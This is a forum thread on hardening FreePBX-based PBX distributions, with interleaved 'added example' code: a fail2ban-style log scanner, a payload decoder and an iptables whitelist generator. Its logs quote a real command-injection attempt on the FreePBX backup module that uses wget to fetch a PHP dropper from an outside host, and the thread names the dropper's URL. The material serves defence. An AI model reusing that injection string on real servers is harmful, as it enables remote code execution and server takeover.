A challenge to all FreePBX based Distros

For those who are following . .

Same machine /var/log/httpd/error.log now has

[Wed Jun 10 16:49:41 2015] [error] [client 185.25.151.159] script '/var/www/html/testproxy.php' not found or unable to stat
[Wed Jun 10 16:51:07 2015] [error] [client 192.187.110.98] script '/var/www/html/testproxy.php' not found or unable to stat
[Wed Jun 10 18:53:37 2015] [error] [client 31.3.226.2] File does not exist: /var/www/html/billing
[Wed Jun 10 19:08:02 2015] [error] [client 207.244.91.3] File does not exist: /var/www/html/vtigercrm
[Wed Jun 10 19:08:02 2015] [error] [client 207.244.91.3] client denied by server configuration: /var/www/html/admin/bootstrap.inc.php
[Wed Jun 10 19:36:18 2015] [error] [client 31.3.226.2] File does not exist: /var/www/html/a2b
[Wed Jun 10 22:22:57 2015] [error] [client 93.174.93.192] File does not exist: /var/www/html/payment
[Thu Jun 11 02:51:07 2015] [error] [client 222.205.106.165] File does not exist: /var/www/html/phpMyAdmin
[Thu Jun 11 02:51:10 2015] [error] [client 222.205.106.165] File does not exist: /var/www/html/pma
[Thu Jun 11 02:51:14 2015] [error] [client 222.205.106.165] File does not exist: /var/www/html/myadmin
[Thu Jun 11 06:29:23 2015] [error] [client 94.102.53.195] File does not exist: /var/www/html/html
[Thu Jun 11 06:46:07 2015] [error] [client 185.25.151.159] script '/var/www/html/testproxy.php' not found or unable to stat
[Thu Jun 11 06:46:09 2015] [error] [client 185.49.15.23] script '/var/www/html/testproxy.php' not found or unable to stat
[Thu Jun 11 10:02:36 2015] [error] [client 210.209.138.72] File does not exist: /var/www/html/phpMyAdmin
[Thu Jun 11 10:02:40 2015] [error] [client 210.209.138.72] File does not exist: /var/www/html/pma
[Thu Jun 11 10:02:43 2015] [error] [client 210.209.138.72] File does not exist: /var/www/html/myadmin
[Thu Jun 11 10:12:42 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:12:42 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:12:53 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:03 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:04 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:10 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:14 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:15 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:18 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:18 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:20 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:21 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:21 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:28 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:28 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:36 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:46 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager

These can be effectively eliminated with apache-noscript and apache-nohome jails.

Simply changing the ssh port from 22 will stop

Jun 10 13:58:44 localhost sshd[7831]: Invalid user ubnt from 190.12.31.42
Jun 10 13:58:48 localhost sshd[7833]: Invalid user admin from 190.12.31.42
Jun 10 14:55:47 localhost sshd[15217]: Invalid user ubnt from 183.57.41.101
Jun 10 18:17:54 localhost sshd[3510]: Invalid user ubnt from 58.67.159.31
Jun 10 21:22:28 localhost sshd[8553]: Invalid user a from 219.153.15.122
Jun 10 21:22:32 localhost sshd[8555]: Invalid user arun from 219.153.15.122
Jun 10 22:00:49 localhost sshd[9561]: Invalid user ubnt from 117.218.211.52
Jun 11 00:04:39 localhost sshd[13016]: Invalid user a from 221.226.106.188
Jun 11 02:32:46 localhost sshd[16946]: Invalid user sql from 91.200.12.73
Jun 11 02:32:49 localhost sshd[16948]: Invalid user sql from 91.200.12.73
Jun 11 03:33:24 localhost sshd[18547]: Invalid user server from 91.200.12.73
Jun 11 03:33:28 localhost sshd[18549]: Invalid user server from 91.200.12.73
Jun 11 04:11:13 localhost sshd[19925]: Invalid user admin from 91.200.12.73
Jun 11 04:11:16 localhost sshd[19927]: Invalid user admin from 91.200.12.73
Jun 11 04:36:05 localhost sshd[20606]: Invalid user ubnt from 202.85.213.203
Jun 11 06:09:04 localhost sshd[23066]: Invalid user xiuzuan from 27.17.18.141
Jun 11 12:23:53 localhost sshd[930]: Invalid user ubnt from 60.213.190.98
Jun 11 12:52:06 localhost sshd[1820]: Invalid user ubnt from 59.79.168.63
Jun 11 13:12:43 localhost sshd[2641]: Invalid user ubuntu from 60.5.185.18
Jun 11 13:12:47 localhost sshd[2643]: Invalid user ubuntu from 60.5.185.18
Jun 11 14:50:15 localhost sshd[4023]: Invalid user ubnt from 210.57.210.12

At least fail2ban catches those in general.

Hopefully you are seeing that adding prophylactic measures can only improve your current “security theater”
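Added example, not code from the post above and not fail2ban's own filter definitions: a fail2ban-style sweep over Apache 2.2 error_log lines of the shape dicko quotes. Two filters stand in for what the apache-noscript and apache-nohome jails are being used for here (probes for scripts that do not exist, and requests Apache refused by configuration), a per-client sliding findtime window counts matches, and the result is which clients would have been banned and when. The regexes, the findtime/maxretry values and the sample lines are this example's own assumptions; the shipped filters live in /etc/fail2ban/filter.d and differ in detail.

```python
"""fail2ban-style replay of Apache error_log lines (added example, not fail2ban code)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache 2.2 error_log layout: [Thu Jun 11 10:12:42 2015] [error] [client 1.2.3.4] message
LINE_RE = re.compile(
    r"^\[(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4})\] "
    r"\[error\] \[client (?P<ip>[\d.]+)\] (?P<msg>.*)$"
)

FILTERS = {
    # probes for scripts/paths that do not exist (vtigercrm, phpMyAdmin, *.php droppers)
    "missing-script": re.compile(
        r"(script '.*' not found or unable to stat|File does not exist: )"
    ),
    # requests that hit a path Apache's config denies (FreePBX internals under /admin, /recordings)
    "denied-by-config": re.compile(r"client denied by server configuration: "),
}

def parse_line(line):
    """Return (timestamp, client_ip, message), or None if the line is not an error entry."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    # collapse the double space Apache puts before single-digit days
    ts = datetime.strptime(" ".join(m.group("ts").split()), "%a %b %d %H:%M:%S %Y")
    return ts, m.group("ip"), m.group("msg")

def scan(lines, findtime=timedelta(minutes=10), maxretry=3):
    """Replay the log in order.  For each filter keep the recent hit times per
    client; the first time a client has maxretry hits inside findtime it is
    'banned' and its later hits are ignored.  Returns {filter: {ip: ban_time}}."""
    windows = defaultdict(lambda: defaultdict(list))
    bans = {name: {} for name in FILTERS}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, ip, msg = parsed
        for name, pattern in FILTERS.items():
            if ip in bans[name] or not pattern.search(msg):
                continue
            # keep only hits still inside the window, then add this one
            hits = [t for t in windows[name][ip] if ts - t <= findtime] + [ts]
            windows[name][ip] = hits
            if len(hits) >= maxretry:
                bans[name][ip] = ts
    return bans

# Constructed sample, modelled on the lines quoted in the thread (not a real capture).
SAMPLE_LOG = """\
[Wed Jun 10 16:49:41 2015] [error] [client 185.25.151.159] script '/var/www/html/testproxy.php' not found or unable to stat
[Thu Jun 11 06:46:07 2015] [error] [client 185.25.151.159] script '/var/www/html/testproxy.php' not found or unable to stat
[Thu Jun 11 10:12:42 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:12:53 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:03 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 16:30:26 2015] [error] [client 5.196.91.180] File does not exist: /var/www/html/vtigercrm
[Thu Jun 11 16:30:27 2015] [error] [client 5.196.91.180] script '/var/www/html/saky.php' not found or unable to stat
[Thu Jun 11 16:30:27 2015] [error] [client 5.196.91.180] script '/var/www/html/alex.php' not found or unable to stat
[Sat Jun 13 14:14:52 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php
[Sat Jun 13 14:14:52 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php, referer: http://1337s.cc/index.php
[Sat Jun 13 14:14:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
this line is not an apache error entry and is skipped
"""

def run_sample():
    return scan(SAMPLE_LOG.splitlines())

if __name__ == "__main__":
    for name, banned in run_sample().items():
        for ip, when in sorted(banned.items(), key=lambda kv: kv[1]):
            print(f"{name}: ban {ip} at {when}")
```

Two hits from 185.25.151.159 a day apart never reach the threshold, which is the point of findtime; the /manager flood and the vtigercrm/*.php probes do. Raising bantime (as the post later suggests) only matters once a client is in the bans dict, so tune maxretry and findtime against your own error_log before trusting either jail.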

I meant rather,

To be plain & simple: while doing the config & stuff, before having trunks configured etc., the machine is NOT expected to receive any incoming SIP login requests, right?
In fact it is probably not expected to send any kind of requests to the 'net, to servers other than FreePBX owns (mirrors etc.) right?

But this is why it’s relevant to know WHEN do these login attempts actually start happening, in relation to box setup & config process. Or so I think :wink:

In other words: I find it very hard to believe, that, having e.g. installed & configured a system/distro from scratch, FreePBX or else, and ‘just’ by starting Asterisk to >listen< to the SIP traffic, and talk to a SIP trunk, that this kind of auth failures would just start ‘out of the blue’. Either something affiliated with the ‘invaders’ scans the ‘Internet’ for open port 5060, and then passes findings to the invaders, or something from inside the newly configured system calls home (it may even be a minute, harmless, totally unrelated ‘thing’, maybe just something hosted by the same company that owns the ‘invaders’ servers ? NTP ? Ajax ? PHP ? Just to name what comes to my head…)

I know it may sound like a crazy fairy tale :wink: but if /I/ can imagine this, how can I know anyone hasn’t imagined this before :slight_smile:

And of course I might also be completely wrong :wink:

No, as soon as chan-sip/chan-pjsip is loaded by asterisk then traffic on 5060/5061 will become apparent, this machine has no configuration above a login account on the GUI.

It is not a matter of IF that traffic will appear, it’s just a matter of WHEN.

FWIW after a couple of days

104.255.67.233 		network = 104.255.64.0/21    # ARIN    US VOLUM-ARIN                               VolumeDrive
107.150.43.162 		network = 107.150.32.0/19    # ARIN    US DSV4-8                                   DataShack, LC
107.150.44.58 		network = 107.150.32.0/19    # ARIN    US DSV4-8                                   DataShack, LC
119.81.233.117 		network = 119.81.233.112/29  # APNIC   US NETBLK-SOFTLAYER-APNIC-CUST-HP702-AP     franko
173.242.125.166 		network = 173.242.112.0/20   # ARIN    US VOLUMEDRIVE                              VolumeDrive
188.138.102.49 		network = 188.138.0.0/17     # RIPE    DE DE-INTERGENIA-20090508                   PlusServer AG
192.99.67.24 		network = 192.99.0.0/16      # ARIN    CA OVH-ARIN-7                               OVH Hosting, Inc.
195.154.41.244 		network = 195.154.0.0/17     # RIPE    FR FR-ILIAD-ENTREPRISES-CUSTOMERS           Iliad Entreprises Customers
195.154.42.172 		network = 195.154.0.0/17     # RIPE    FR FR-ILIAD-ENTREPRISES-CUSTOMERS           Iliad Entreprises Customers
195.154.42.245 		network = 195.154.0.0/17     # RIPE    FR FR-ILIAD-ENTREPRISES-CUSTOMERS           Iliad Entreprises Customers
199.19.109.121 		network = 199.19.104.0/21    # ARIN    US VOLUMEDRIVE                              VolumeDrive
199.217.116.139 		network = 199.217.112.0/21   # ARIN    US HSI-6                                    Hosting Solutions International, Inc.
212.83.137.201 		network = 212.83.128.0/20    # RIPE    FR FRWOL                                    Tiscali France
212.83.154.176 		network = 212.83.154.0/23    # RIPE    FR FRWOL                                    Tiscali France
212.83.185.153 		network = 212.83.160.0/19    # RIPE    FR FRWOL                                    Iliad
31.3.252.226 		network = 31.3.252.224/29    # RIPE    GB RSDEDI-MCHEHHLN                          Dedicated Server Hosting
46.165.210.84 		network = 46.165.208.0/21    # RIPE    DE NETDIRECT-NET                            Leaseweb Germany GmbH (previously netdirekt e. K.)
5.152.222.50 		network = 5.152.222.48/29    # RIPE    GB RSDEDI-DJNIPIAM                          Dedicated Server Hosting
5.189.144.122 		network = 5.189.144.0/20     # RIPE    DE CONTABO                                  Contabo GmbH
5.189.144.123 		network = 5.189.144.0/20     # RIPE    DE CONTABO                                  Contabo GmbH
5.189.150.193 		network = 5.189.144.0/20     # RIPE    DE CONTABO                                  Contabo GmbH
5.189.190.186 		network = 5.189.176.0/20     # RIPE    DE CONTABO                                  Contabo GmbH
62.210.211.233 		network = 62.210.128.0/17    # RIPE    FR IE-POOL-BUSINESS-HOSTING                 IP Pool for Iliad-Entreprises Business Hosting Customers
62.210.95.30 		network = 62.210.0.0/17      # RIPE    FR IE-POOL-BUSINESS-HOSTING                 IP Pool for Iliad-Entreprises Business Hosting Customers
68.112.84.99 		network = 68.112.84.0/24     # ARIN    US VERM-CBN-68-112-84-0                     Vermont Law School
69.197.179.34 		network = 69.197.128.0/18    # ARIN    US WHOLESALEINTERNET-2                      WholeSale Internet, Inc.
69.64.59.127 		network = 69.64.32.0/19      # ARIN    US HSI-1                                    Hosting Solutions International, Inc.
82.205.21.193 		network = 82.205.16.0/20     # RIPE    PS BSA-BLOCK1-HM-EXPN                       BSA Block
85.25.93.91 		network = 85.25.93.64/26     # RIPE    DE AKTUELLINNRW-NET                         Aktuell in NRWhttp

Notice the developing pattern of clustered attackers, this is not coincidental.

Here is a demonstration of an attack from

host 5.196.91.180 in network 5.196.0.0/16       # RIPE    FR FR-OVH-20120823                          OVH SAS


[root@localhost ~]# cat /var/log/httpd/error_log |grep 5.196.91.180
[Thu Jun 11 16:30:26 2015] [error] [client 5.196.91.180] File does not exist: /var/www/html/vtigercrm
[Thu Jun 11 16:30:26 2015] [error] [client 5.196.91.180] File does not exist: /var/www/html/vtigercrm
[Thu Jun 11 16:30:26 2015] [error] [client 5.196.91.180] File does not exist: /var/www/html/vtigercrm
[Thu Jun 11 16:30:27 2015] [error] [client 5.196.91.180] File does not exist: /var/www/html/vtigercrm
[Thu Jun 11 16:30:27 2015] [error] [client 5.196.91.180] script '/var/www/html/saky.php' not found or unable to stat
[Thu Jun 11 16:30:27 2015] [error] [client 5.196.91.180] script '/var/www/html/k4ijo.php' not found or unable to stat
[Thu Jun 11 16:30:27 2015] [error] [client 5.196.91.180] script '/var/www/html/alex.php' not found or unable to stat
[Sat Jun 13 14:14:52 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php
[Sat Jun 13 14:14:52 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php, referer: http://1337s.cc/index.php
[Sat Jun 13 14:14:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:54 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:54 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:54 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:54 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:55 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:55 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:55 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php
[Sat Jun 13 14:14:56 2015] [error] [client 5.196.91.180] script '/var/www/html/recordings/misc/index.php' not found or unable to stat, referer: http://1337s.cc/index.php
[Sat Jun 13 14:14:56 2015] [error] [client 5.196.91.180] script '/var/www/html/recordings/misc/index.php' not found or unable to stat
[Sat Jun 13 14:14:56 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php
[Sat Jun 13 14:46:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/ama.php
[Sat Jun 13 14:46:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/Do_Me.php
[Sat Jun 13 14:46:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/ama.php

You will see that over days that he is probing for known vulnerabilities (the old hands will perhaps recognize the vulnerabilities), then a couple of days later he tries to inject unsuccessfully

http://1337s.cc/index.php

The interesting correlation is

cat /var/log/httpd/error_log |grep MAYET
[Fri Jun 12 11:00:46 2015] [error] [client 81.10.94.241] File does not exist: /var/www/html/favicon.ico, referer: http://162.42.215.183/admin/modules/backup/page.backup.php?action=deletedataset&dir=%27;wget%20http://184.107.105.35/classes/ELMAYET_ELMAYET.txt%20%20-O%20zz.php;%20echo%20%27mission%20done
[Sat Jun 13 14:14:52 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php
[Sat Jun 13 14:14:55 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php
[Sat Jun 13 14:14:56 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php

One directed google for MAYET would find a guy in South Africa who is an expert in VOIP and security (I’m sure his work was stolen), but if you read the script

http://184.107.105.35/classes/ELMAYET_ELMAYET.txt

(zz.php) it would really be quite devastating if it got on your machine, here apache-nohome jail would have caught him on Thu Jun 11 16:30:26 2015. You should reasonably use a long bantime to mitigate the threat.

Yes this was a failed attempt, but as you see the risk is real and on this machine a related but more robust attack would expose the server to penetration needlessly.

Food for thought maybe? or just should we sweep it under the rug :wink:
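Added example, not code from the post above and not FreePBX code: decode the shell payload carried in the referer of the MAYET log line quoted earlier and pull out the indicators a responder would want (the script targeted, the parameter that was abused, the URL fetched, the file dropped). The log line is copied from the thread as posted; the tainted-parameter heuristic, the indicator regexes and safe_dir_name() are this example's own assumptions about how such input should be screened, not the backup module's actual input handling.

```python
"""Decode and triage the command-injection attempt recorded in the MAYET referer (added example)."""
import re
from urllib.parse import urlsplit, unquote

# Verbatim from the thread: a favicon.ico 404 whose Referer header carries the
# attack URL.  The payload is what the attacker sent; it did not succeed there.
LOG_LINE = (
    "[Fri Jun 12 11:00:46 2015] [error] [client 81.10.94.241] File does not exist: "
    "/var/www/html/favicon.ico, referer: http://162.42.215.183/admin/modules/backup/"
    "page.backup.php?action=deletedataset&dir=%27;wget%20http://184.107.105.35/classes/"
    "ELMAYET_ELMAYET.txt%20%20-O%20zz.php;%20echo%20%27mission%20done"
)

SHELL_META = re.compile(r"[;|&`$\n]")                 # ends or chains a shell command
FETCH_CMD = re.compile(r"\b(?:wget|curl)\b[^;|&]*?(?P<url>https?://\S+)")
OUTFILE = re.compile(r"(?:-O|-o)\s+(?P<file>[^\s;|&]+)")
SAFE_DIR = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]{0,63}$")  # assumption: one plain component

def query_params(url):
    """Split a URL's query on '&' only (a ';' here is payload, not a separator)
    and percent-decode each key and value."""
    params = {}
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key:
            params[unquote(key)] = unquote(value)
    return params

def analyse(line):
    """Return findings for an error_log line that carries a referer, else None."""
    m = re.search(r", referer: (\S+)$", line.strip())
    if not m:
        return None
    ref = m.group(1)
    parts = urlsplit(ref)
    params = query_params(ref)
    # any decoded value containing shell metacharacters is treated as tainted
    tainted = {k: v for k, v in params.items() if SHELL_META.search(v)}
    payload = " ".join(tainted.values())
    fetch = FETCH_CMD.search(payload)
    out = OUTFILE.search(payload)
    return {
        "target_host": parts.netloc,
        "target_script": parts.path,
        "tainted_params": tainted,
        "fetch_url": fetch.group("url") if fetch else None,   # where the dropper is pulled from
        "dropped_file": out.group("file") if out else None,   # what it would be saved as
    }

def safe_dir_name(value):
    """Allow-list check of the kind any script that hands a directory name to a
    shell must apply: one path component, no separators, no metacharacters."""
    return bool(SAFE_DIR.match(value)) and ".." not in value

if __name__ == "__main__":
    for key, val in analyse(LOG_LINE).items():
        print(f"{key}: {val}")
    print("dir parameter passes allow-list:", safe_dir_name(analyse(LOG_LINE)["tainted_params"]["dir"]))
```

The decoded dir value reads `';wget http://184.107.105.35/classes/ELMAYET_ELMAYET.txt  -O zz.php; echo 'mission done`: the leading quote closes whatever string the parameter was being interpolated into, the semicolon starts a new command, and the echo at the end tidies the trailing quote. The two things worth keeping from it are the download host and the dropped filename (zz.php), which are what you grep the web root and the access log for afterwards.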

(to this and the next message)
Interesting, indeed.

Can we treat this in stages, probably?

  • pre-requisite: set up wireshark or something like that on separate machine (or separate VM maybe even better), adjacent to the one you’re looking at, to intercept / look at packet flow incoming to the one where you’ll be installing FreePBX.
  • at the very least record packet source and destination (and src/dst ports) in timely correlation with
  • distro setup (take note of FreePBX servers/mirrors accessed)
    (- system set up, first ever GUI / dashboard /access/login)
  • system up, NOT running asterisk
  • system up, running asterisk but no chan-sip/chan-pjsip / not listening to port 5060
  • system up, running asterisk with channel module as described above (no configuration but a login account on the GUI)
  • (what the above is supposed to track/find, is : are there any hosts on the 'net other than FreePBX Project/Sangoma/Digium etc, that your test machine is sending ANY sort of packets TO at ANY point ? Even the smallest ones.)

Like I said, I find it quite unbelievable, that a newly setup system would ‘just’ get itself under potential bruteforcing or DDoS attack ‘just like that’ without something ‘from inside’ of it letting the invaders know it’s there. Note that ‘something inside’ may also be completely unrelated to Asterisk.

Hope this helps & that it’s not crazy talk :wink:

You could do all that crazy stuff but the result would not reveal anything nefarious.
Any unsolicited connection on any port that your server has open will be serviced. This includes tcp 5038, 22, 80, 8088 and the one that isymphony uses, also udp 53, 69, 123, 4569, 5060 and 5061 on this machine.

Whether you find it believable or not, connections WILL eventually arrive on those ports. At this point in time this machine has only filtered ssh tcp/22 successfully 80 times for 2 hosts out of +14000 total connections from 227 different hosts, a vast majority of which were to udp/5060 but a significant minority to http “files” and “scripts” that don’t exist.

I wanted to respond to dicko’s original request concerning the need for an open source firewall on all of the aggregations. Couldn’t agree more! For what it’s worth, here’s what we have done thus far with Incredible PBX, and we plan to implement the same methodology in the next iteration of PBX in a Flash. We’ve shared the same setup with the Elastix folks. We use a combination of IPtables, Fail2Ban, Port Knocker, and VPNs to lock down servers as part of the base install using a whitelist of local IP addresses, ITSP’s, and the IP addresses of the server itself and the desktop machine from which the server was created. Users can add/delete whitelist entries using simple scripts. Entries can be either IP addresses, ranges of IP addresses, or FQDNs. Port Knocker assures that nobody ever gets locked out of their server because of a missing whitelist address. We would be more than happy to share our GPL tools with anyone deploying GPL-based systems.

As a general rule, we’ve concluded that blacklists don’t work. They either get poisoned by nefarious activity from the bad guys themselves, or they drive everyone crazy trying to keep them updated, or the bad guys use compromised (mostly Windows) PCs to gain access. Having said that, country-specific blacklists work pretty well to at least reduce exposure from countries that should never have access to your server. We’ve had good results with ipset except with OpenVZ cloud-based servers. ipset hooks into the kernel just like IPtables. Here is a tutorial that will show you how to set it up: http://pbxinaflash.com/community/index.php?resources/iptables-blacklist-countries.45/

We appreciate that whitelists cause problems for remote users, especially the technically challenged who frequently travel to different places. Port Knocker works great to quickly open up IPtables for remote access with one button click from any smartphone. VPN access from a smartphone is our preferred remote access approach. Dynamic DNS also is an option for Android users. Unfortunately, it doesn’t work with iPhones. For more permanent remote users, e.g. satellite office workers, we recommend either phones with built-in VPNs or FQDNs using dynamic DNS tools on both the server and remote site.
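Added example, not code from Ward's post and not the Incredible PBX or PBX in a Flash tooling: a generator for an ipset-backed iptables whitelist of the shape described above. Entries may be single addresses, CIDR blocks, first-last ranges or FQDNs; FQDNs are resolved through a lookup table that is a constructed stand-in for DNS so the example runs offline (in practice use socket.getaddrinfo). The set name, chain layout and the port list (taken from the services dicko lists as open on his box) are this example's own choices. It prints the commands rather than executing them.

```python
"""Generate ipset/iptables whitelist rules for a PBX host (added example, IPv4 assumed)."""
import ipaddress

# Constructed stand-in for DNS so the example runs offline.
FAKE_DNS = {
    "sip.example-itsp.net": ["203.0.113.10", "203.0.113.11"],
    "office.example.com": ["198.51.100.7"],
}

# Services reachable on the FreePBX box; anything not whitelisted is dropped before it reaches them.
SERVICE_PORTS = {"tcp": [22, 80, 5038, 8088], "udp": [4569, 5060, 5061]}

def normalize_entry(entry, resolver=FAKE_DNS.get):
    """Turn one whitelist entry into a list of CIDR strings for ipset.
    Raises ValueError for anything that is neither an address, a CIDR,
    a first-last range, nor a name the resolver knows."""
    entry = entry.strip()
    try:                                   # plain address or CIDR block
        return [str(ipaddress.ip_network(entry, strict=False))]
    except ValueError:
        pass
    if "-" in entry:                       # first-last range, e.g. 10.0.0.1-10.0.0.4
        try:
            first, last = (ipaddress.ip_address(p.strip()) for p in entry.split("-", 1))
            return [str(n) for n in ipaddress.summarize_address_range(first, last)]
        except ValueError:
            pass                           # not a range; may be a hyphenated host name
    addrs = resolver(entry) or []
    if not addrs:
        raise ValueError(f"cannot parse or resolve whitelist entry: {entry!r}")
    return [str(ipaddress.ip_network(a)) for a in addrs]

def build_rules(whitelist, set_name="pbx_whitelist", resolver=FAKE_DNS.get):
    """Return the shell commands for a default-deny policy on the PBX service
    ports, with the whitelist set as the only accepted source."""
    cmds = [f"ipset create {set_name} hash:net -exist"]
    for entry in whitelist:
        for net in normalize_entry(entry, resolver):
            cmds.append(f"ipset add {set_name} {net} -exist")
    cmds += [
        # a dedicated chain keeps the policy readable and re-runnable
        "iptables -N PBX_SERVICES 2>/dev/null || iptables -F PBX_SERVICES",
        "iptables -A PBX_SERVICES -i lo -j ACCEPT",
        "iptables -A PBX_SERVICES -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT",
        f"iptables -A PBX_SERVICES -m set --match-set {set_name} src -j ACCEPT",
        "iptables -A PBX_SERVICES -j DROP",
    ]
    for proto, ports in SERVICE_PORTS.items():
        rule = f"INPUT -p {proto} -m multiport --dports {','.join(map(str, ports))} -j PBX_SERVICES"
        # -C checks for the rule first so re-running does not stack duplicates
        cmds.append(f"iptables -C {rule} 2>/dev/null || iptables -A {rule}")
    return cmds

if __name__ == "__main__":
    # constructed whitelist: LAN, the ITSP by name, the admin's desktop, a small range
    example = ["192.168.1.0/24", "sip.example-itsp.net", "office.example.com", "10.0.0.1-10.0.0.4"]
    print("\n".join(build_rules(example)))
```

Two caveats that follow from Ward's description: the whitelist must contain the address you administer from before the DROP goes in (his Port Knocker exists precisely to recover from forgetting that), and since the example only adds entries, a stale ITSP address has to be removed with `ipset del` or by rebuilding the set. A hash:net set holds one address family, so an IPv6 whitelist needs a second set and ip6tables rules of the same shape.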

Thanks Ward , the first on topic reply yet :slight_smile:

As to VPNs, and given their known insecurities (google it), are yours absolutely limited to SIP/IAX2 and related connections if appropriate? If not, you open up a whole new ballgame on your internal network’s firewall needs also: wild Android, Windows and Apple machines running rampant on your network with no curbs as to what they can do. What could possibly go wrong here?

(Come on guys 400 odd reads in a week and nobody has ANYTHING to say ? . . .)

@dicko: A challenge to all FreePBX based Distros was not on topic ? :smile:

it was you who started the off-topic with the bad IP addresses et al. here :stuck_out_tongue: :slight_smile:

Let me rephrase that:

Almost everyone has different usage conditions
What works for me, almost certainly won’t work for anybody else unless they have very similar setup.
Therefore just including a ‘firewall builder’ solution into the distro is going to ultimately end up setting it into the most permissive mode possible OOTB, and there is a good chance people will leave it like that forever, thus it will become a bloat and a nuisance and a forum post volume pump, instead of having a chance of protecting anything. If you set it to restrictive mode, people will set it to permissive while trying to get things working and then forget to put it into restrictive mode again.
And then there is the thing @TheJames said about packaging security, which I could not have said better either :wink:

What @Ward is describing, and I agree with, is a firewall on all aggregating points. But I’ll argue that a dedicated FreePBX deployment on an appliance does not necessarily count as one (like, mine is behind a specialized gateway/firewall/NAT device) (exception - probably something like PIAF/Elastix installed on your home broadband router with much more limited resources than a dedicated appliance can have; I can recognize that. Would /I/ use it for intra office purposes ? Probably not. But YMMV, or - if it may come to that, who knows… then I would like for such a device to have strongest firewall applicable.)

Whether you agree or not, you NEED a firewall (you are already using fail2ban, which in your case is currently ineffectual in some deployments). A good firewall will allow what you want and deny what you don’t want; the concept is as simple as that.

As to what you want (which is not the same as what you need), use miscellaneous scripts or perhaps use a mature and more than adequate “firewall builder” like CSF.

I suggest you read

http://download.configserver.com/csf/readme.txt

for the basic principles, concepts and abilities. It can do a LOT more to monitor your system and then inject in realtime iptables “allows” and “denies” as appropriate than any “miscellaneous script” I know of can.

If your use case is not generally included in that document or you think it is all pixie dust, then please suggest an alternative.

https://xkcd.com/386/ :smile:

thx dicko will read later.

May I strongly suggest muting the audio when playing this video. The acoustic guitar rendition of Pachelbel’s Canon in D major is really bad musicianship.

:turtle: This turtle could keep better time.

I had been out of the loop lately and had not seen port knocker. it’s a good idea.

I suggested a year ago in my organization that we build a dynamic DNS server. Clients would run the DDNS client. The firewall would then only accept IP traffic from users authenticated on the DDNS platform.

